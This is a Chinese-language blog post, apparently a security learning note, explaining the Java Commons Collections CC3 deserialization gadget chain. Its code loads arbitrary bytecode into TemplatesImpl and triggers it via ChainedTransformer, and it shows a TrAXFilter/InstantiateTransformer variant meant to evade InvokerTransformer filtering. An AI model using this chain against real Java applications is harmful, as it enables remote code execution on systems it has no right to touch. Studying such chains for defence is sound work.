Posted Updated 3 minutes read (About 420 words)

java-cc3

##执⾏任意字节码的CommonsCollections利⽤链
结合前面的defineClass执行字节码的代码
###使用 new TemplatesImpl()

 public static void main(String[] args) throws Exception {
        TemplatesImpl template = new TemplatesImpl();
        Class tc = template.getClass();
        Field nameField= tc.getDeclaredField("_name");
        nameField.setAccessible(true);
        nameField.set(template,"aaa");

        Field bytecodesField = tc.getDeclaredField("_bytecodes");
        bytecodesField.setAccessible(true);

        byte[] code = Files.readAllBytes(Paths.get("/Users/tlif3./Desktop/www/java_web/cc1/cc1_1/src/main/java/org/example/runtime.class"));
        byte[][] codes = {code};

        Field tfactoryField = tc.getDeclaredField("_tfactory");
        tfactoryField.setAccessible(true);
        tfactoryField.set(template,new TransformerFactoryImpl());

        bytecodesField.set(template,codes);

//        template.newTransformer();
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(template),
                new InvokerTransformer("newTransformer",null,null)
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        chainedTransformer.transform(Runtime.class);
    }

简化版如下

byte[] code =
Base64.getDecoder().decode("");
 TemplatesImpl obj = new TemplatesImpl();
 setFieldValue(obj, "_bytecodes", new byte[][] {code});
 setFieldValue(obj, "_name", "HelloTemplatesImpl");
 setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
 Transformer[] transformers = new Transformer[]{
 new ConstantTransformer(obj),
 new InvokerTransformer("newTransformer", null, null)
 };
 Transformer transformerChain = new
ChainedTransformer(transformers);

##CC3
在cc3中,主要改变的是前面的invokeTransformer的调用,因为在这里是为了绕过过滤了invokerTransformer以后能够继续命令执行,所以这里采用的是
org.apache.commons.collections.functors.InstantiateTransformer
InstantiateTransformer也是⼀个实现了Transformer接⼝的类,他的作⽤就是调⽤构造⽅法
那么这个时候我们就只需要找到一个构造方法里面含有newTransformer的方法就行,那么我们就可以通过执行字节码的方式来执行命令了。
而这里使用的类就是com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter

这个类的构造方法中调用了(TransformerImpl)templates.newTransformer(),因此我们无需使用InvokerTransformer手工调用newTransformer这一步

Transformer[] transformers = new Transformer[]{
        new ConstantTransformer(TrAXFilter.class),
        new InstantiateTransformer(
                new Classp[] {Templates.class},
                new Object[] {obj}
        )
};

在这里可以发现,有一个transform,对传入的类进行实例化了,类似于invoketransform的功能

java-cc3

http://example.com/2023/01/09/javacc3/

Author

vague huang

Posted on

2023-01-09

Updated on

2023-02-10

Licensed under

Like this article? Support the author with

Comments

Follow

Links

Recents

Archives

Tags

CSRF1
MYSQL1
PHP5
XSS1
bugku3
bugku21
hexo1
html1
html原理1
php2
sqlmap1
sql注入9
typro1
xss1
反弹shell2
文件上传1
文件包含1
渗透测试1

Subscribe for updates

You need to set client_id and slot_id to show this AD unit. Please set it in _config.yml.

follow.it

×